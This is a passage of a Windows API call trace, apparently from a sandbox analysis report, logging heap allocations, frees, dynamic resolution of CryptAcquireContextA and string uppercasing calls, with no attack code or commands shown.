hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0260.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0260.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.861] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0260.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0260.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0260.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.862] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0260.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0260.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.863] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0260.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.869] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0260.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0260.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.870] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.870] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0260.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0260.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0260.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0260.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0260.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0260.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0260.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0260.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0260.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.871] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0260.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0260.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0260.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.872] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0260.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0260.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0260.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0260.872] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0260.872] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0260.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.873] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.874] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.874] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0260.874] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.874] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0260.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0260.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.874] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0260.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.875] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0260.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0260.875] HeapFree (in: 